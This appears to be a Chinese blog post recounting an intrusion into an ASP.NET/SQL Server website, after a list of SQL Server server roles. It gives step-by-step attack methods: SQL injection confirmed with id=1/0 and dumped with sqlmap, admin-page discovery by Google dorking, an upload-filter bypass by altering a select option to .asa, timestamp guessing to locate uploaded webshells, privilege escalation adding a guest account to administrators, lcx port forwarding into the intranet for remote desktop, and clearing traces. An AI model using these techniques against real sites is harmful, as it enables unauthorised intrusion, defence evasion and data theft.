先罗列出sql server 角色用户的权限

按照从最低级别角色(bulkadmin)到最高级别角色(sysadmin)的顺序进行描述:
1.bulkadmin:这个角色可以运行BULK INSERT语句.该语句允许从文本文件中将数据导入到SQL Server2008数据库中,为需要执行大容量插入到数据库的域帐号而设计.
2.dbcreator:这个角色可以创建,更改,删除和还原任何数据库.不仅适合助理DBA角色,也可能适合开发人员角色.
3.diskadmin:这个角色用于管理磁盘文件,比如镜像数据库和添加备份设备.适合助理DBA
4.processadmin:SQL Server 2008可以同时多进程处理.这个角色可以结束进程(在SQL Server 2008中称为"删除")
5.public:有两大特点:第一,初始状态时没有权限;第二,所有数据库用户都是它的成员
6.securityadmin:这个角色将管理登录名及其属性.可以授权,拒绝和撤销服务器级/数据库级权限.可以重置登录名和密码
7.serveradmin:这个角色可以更改服务器范围的配置选项和关闭服务器
8.setupadmin:为需要管理联接服务器和控制启动的存储过程的用户而设计.
9.sysadmin:这个角色有权在SQL Server 2008 中执行任何操作.

第一步先找到了网站的新闻页通过aspx 后缀结尾 判断 基本信息   windows系统 ,数据库可能是mssql

尝试 id=1/0   报语法错误  410     /应用程序种的服务器错误....  显而易见是mssql 数据库 并且存在sql注入

第二步 再去查他的ip以及网站信息  发现只是地方服务器 没有大厂商的云服务器判断不存在云waf (如果有ip被封了可以换代理ip) 可以直接上工具

第三步  直接sqlmap 跑出表和数据 角色权限public自定义的很低     继续信息收集

第四步  发现前台没什么可利用的信息  先写脚本爬虫 得到网站基本目录 和资源存放地址和一些规则   在上御剑扫描没什么有用信息

第五步  还可以利用强大的搜索引擎  利用google hack 语法 搜索试试  site:  *.xxx.com 登录    成功搜索到后台地址

第六步  打开页面地址 通过和前台规则比对 确认是后台地址    输入sqlmap 获取用户名信息登录上去

第七步 寻找上传点找到select 选择框的上传功能 但发现只能上传db 文件  其他文件后缀会自动修改   认真整理他的逻辑 在进入上传点前一个一面

有url 请求   type=db   审查元素发现  select选择框 内 option 元素 <value=db>  <value=txt>  由此可以确定他的逻辑  通过选择框来选择执行上面逻辑和确认上传格式文件  直接篡改 成asa (aspx被禁止了)  成功上传

第八步  发现上传成功没有回显无法确定路径和文件名 但是选择img type上传后回显 可以确定上传目录 通过图片命名格式 img201509246518.png  可以猜测命名规则  img 是类型   2015.. 是今天日期 后面可能是当前时间戳   我只需要确定后门的时间戳就行了  写个js脚本发送10次上传木马的请求 同时记录请求时间   通过第1次 时间 和第10次 时间 相减 得到 的时间区间 有十个马  通过遍历这个区间 成功得到相应的就是马的地址

第九步 打开大马查看组件 发现 cmd 和net  组件都被删了 探测后台进程有服务端的安全狗   通过大马上传net,cmd 组件到有执行权限的目录 比如当前的回收站    执行systeminfo 得到打的补丁数 只有4个   上传免杀pr 利用内存溢出直接提权 把来宾用户设置密码加入管理员组

 第十步  输入 netatst -ano  发现80端口并不是原地址 有监听地址  通过查询发现他是个内网地址 可以确认通过外网把内网的80端口做了映射  上传lcx 做端口转发   本机执行 lcx -listen 3000   3388 监听 3000 映射到3388  端口     webshell 机子上执行 -slave  我的ip  3000 192.xxx (内网ip)  3389    转发到我的3000端口  本机打开远程连接 输入  127.0.0.1:3388  输入刚刚修改密码的来宾用户  连接webshell 的机子  完美控制    。

第十一步  清理痕迹退出 把漏洞提交到漏洞平台。

对此站渗透的思考

1.可以直接利用扫描工具 wvs appscan webinspect jsky 极光等

2. 对结果就行定向渗透测试

3.shell 方法  上传,包含,命令执行,备份。

4.提权先看打了什么补丁  在看安装的第三方应用    通过ms漏洞提权 和应用提权

5.在拥有webshell 情况下 利用lcx 端口转发突破内网限制

6.信息收集很重要

提权案例(一)渗透某asp.net网站通过sql server数据库public 提权 思路分享的更多相关文章

  1. PHP连接MSSQL数据库案例,PHPWAMP多个PHP版本连接SQL Server数据库

    课前小知识普及:MSSQL和SQL Server是同一个软件,叫法不同而已,MSSQL全称是Microsoft SQL Server,MSSQL是简写,有些人则喜欢直接叫SQL Server,我就比较 ...

  2. 【转发】PHP连接MSSQL数据库案例,PHPWAMP多个PHP版本连接SQL Server数据库

    转发自:http://blog.csdn.net/lccee/article/details/54289076 课前小知识普及:MSSQL和SQL Server是同一个软件,叫法不同而已,MSSQL全 ...

  3. 菜鸟级asp.net 与ms sql server数据库打交道的简单总结

    using System.Data.SqlClient;using System.Data; 上面是必须的 下面说的都是用存储过程 首先是webconfig里面的连接字符串: <connecti ...

  4. ASP.NET Excel导入Sql Server数据库(转)

    先看界面图 实现的基本思想: 1,先使用FileUpload控件fuload将Excel文件上传到服务器上得某一个文件夹. 2,使用OleDb将已经上传到服务器上的Excel文件读出来,这里将Exce ...

  5. .NET跨平台之旅:升级至ASP.NET 5 RC1,Linux上访问SQL Server数据库

    今天微软正式发布了ASP.NET 5 RC1(详见Announcing ASP.NET 5 Release Candidate 1),.NET跨平台迈出了关键一步. 紧跟这次RC1的发布,我们成功地将 ...

  6. 如何用asp.net MVC框架、highChart库从sql server数据库获取数据动态生成柱状图

    如何用asp.net MVC框架.highChart库从sql server数据库获取数据动态生成柱状图?效果大概是这样的,如图: 请问大侠这个这么实现呢?

  7. (火炬)MS SQL Server数据库案例教程

    (火炬)MS SQL Server数据库案例教程 创建数据库: CREATE DATABASE TDB //数据库名称 ON ( NAME=TDB_dat,//逻辑文件名 在创建数据库完成之后语句中引 ...

  8. ASP.net(C#)利用SQL Server实现注册和登陆功能

    说说我现在吧,楼主现在从事的事IT行业,主攻DotNet技术:当然这次上博客园我也是有备而来,所有再次奉献鄙人拙作,以飨诸位,望诸位不吝赐教. 世界上大多数的工作都是熟练性的工种,编程也不例外,做久了 ...

  9. ASP.NET Excel导入到SQL Server数据库

    本文转自:http://www.cnblogs.com/lhking/archive/2009/06/08/1499002.html 提供把Excel里的数据导入到SQL Server 数据库,前提是 ...

随机推荐

  1. Linux 笔记 - 第二十一章 配置 NFS 服务

    一.前言 NFS(Network File System,网络文件系统),主要功能是通过网络(一般是局域网)让不同的主机系统之间可以共享文件或目录.NFS 客户端(一般为应用服务器,例如web)可以通 ...

  2. Set集合、List集合

    集合体系:Collection.Map接口 存储数量不等的多个对象,不能存储基本数据类型,如存储基本数据类型会自动装箱 ======================================== ...

  3. 简单粗暴的关键两部实现连接远程云服务器数据库SqlServer 2012

    要连上远程服务器的数据库,前面的那些数据库配置就不说了,网上都一样. 下面讲讲关键的两点,也是我尝试普通的方法无效后通过下面的方法成功连上的. 1.点开云服务器的安全组,看看里面的端口是否都放行了.我 ...

  4. UVM——寄存器模型相关的一些函数

    0. 引言 在UVM支持的寄存器操作中,有get.update.mirror.write等等一些方法,在这里整理一下他们的用法. 寄存器模型中的寄存器值应该与DUT保持同步,但是由于DUT的值是实时更 ...

  5. Java中的方法和方法重载

    上次我们讲了Java中的一些基本的语法;今天我们就讲一点内容,来说说Java中的方法和方法重载以及需要注意的一些地方; 方法: Java的方法类似与其他语言的函数,是一段用来完成特定功能的代码片段, ...

  6. 深入全面理解面向对象的 JavaScript

    深入全面理解面向对象的 JavaScript (原著: 曾 滢, 软件工程师, IBM,2013 年 4 月 17 日) JavaScript 函数式脚本语言特性以及其看似随意的编写风格,导致长期以来 ...

  7. Django+MySQL Dashboard 网页端数据库可视化

    1. Overview Python+MySQL+Django, 有些数据托管在 MySQL 的数据库,然后我们希望进行可视化,通过 web 的方式对数据库的信息去进行展示/检索/维护/.. 这个项目 ...

  8. redirectTo、navigateTo与switchTap区别

    老是记忆不大清楚,简单写一下 简单作区分就是: redirectTo:关闭当前页(卸载),跳转到指定页 navigateTo:保留当前页(隐藏),跳转到指定页 switchTap:只能用于跳转到tab ...

  9. Maven 梳理 -eclipse中创建Maven的web项目

    已验证成功: 1.创建Maven的Web工程 新建Maven工程:File -> New -> Maven Project,具体如下所示: 点击Next进入下述页面,下方的窗口是我们选择所 ...

  10. 【干货总结】:可能是史上最全的MySQL和PGSQL对比材料

    [干货总结]:可能是史上最全的MySQL和PGSQL的对比材料 运维了MySQL和PGSQL已经有一段时间了,最近接到一个数据库选型需求,于是便开始收集资料整理了一下,然后就有了下面的对比表 关键词: ...